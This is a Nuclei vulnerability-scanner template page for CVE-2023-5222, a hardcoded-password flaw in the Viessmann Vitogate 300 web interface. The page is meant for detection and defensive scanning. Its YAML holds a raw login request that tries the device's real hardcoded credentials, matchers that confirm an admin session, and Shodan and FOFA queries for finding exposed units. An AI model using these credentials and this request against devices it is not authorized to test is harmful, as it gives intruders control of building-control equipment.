Skip to content
Nuclei Templates

Viessmann Vitogate 300 - Hardcoded Password

ID: CVE-2023-5222

Severity: critical

Author: ritikchaddha

Tags: cve,cve2023,viessmann,vitogate,default-login

Description

Section titled “Description”

A critical vulnerability in Viessmann Vitogate 300 up to 2.1.3.0 allows attackers to authenticate using hardcoded credentials in the Web Management Interface.

YAML Source

Section titled “YAML Source”
id: CVE-2023-5222


info:
  name: Viessmann Vitogate 300 - Hardcoded Password
  author: ritikchaddha
  severity: critical
  description: |
    A critical vulnerability in Viessmann Vitogate 300 up to 2.1.3.0 allows attackers to authenticate using hardcoded credentials in the Web Management Interface.
  impact: |
    An attacker could potentially gain unauthorized access to the device.
  remediation: |
    Update the device firmware to remove the hardcoded password or change it to a strong, unique password.
  reference:
    - https://vuldb.com/?ctiid.240364
    - https://vuldb.com/?id.240364
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5222
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-5222
    cwe-id: CWE-259
    epss-score: 0.00164
    epss-percentile: 0.52433
    cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: title:"Vitogate 300"
    fofa-query: title="Vitogate 300"
    vendor: viessmann
    product: vitogate_300_firmware
  tags: cve,cve2023,viessmann,vitogate,default-login


http:
  - raw:
      - |
        POST /cgi-bin/vitogate.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json


        {"method":"put","form":"form-login","params":{"uid":"{{username}}","pwd":"{{password}}"}}


    attack: pitchfork
    payloads:
      username:
        - vitomaster
        - vitogate
      password:
        - viessmann1917
        - viessmann


    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'admin":true'
          - '"sessionId":'
        condition: and


      - type: word
        part: content_type
        words:
          - 'application/json'


      - type: status
        status:
          - 200
# digest: 490a00463044022000a840b5a5e338c264a5eefbb4483b4c95edbecf4f372a417b362af89ce6bd9102203a59992bbeb1da9e0ac4d77ca1888d12d7ba878780ad1f99e8f4988ecb8b36ec:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-5222.yaml"

View on Github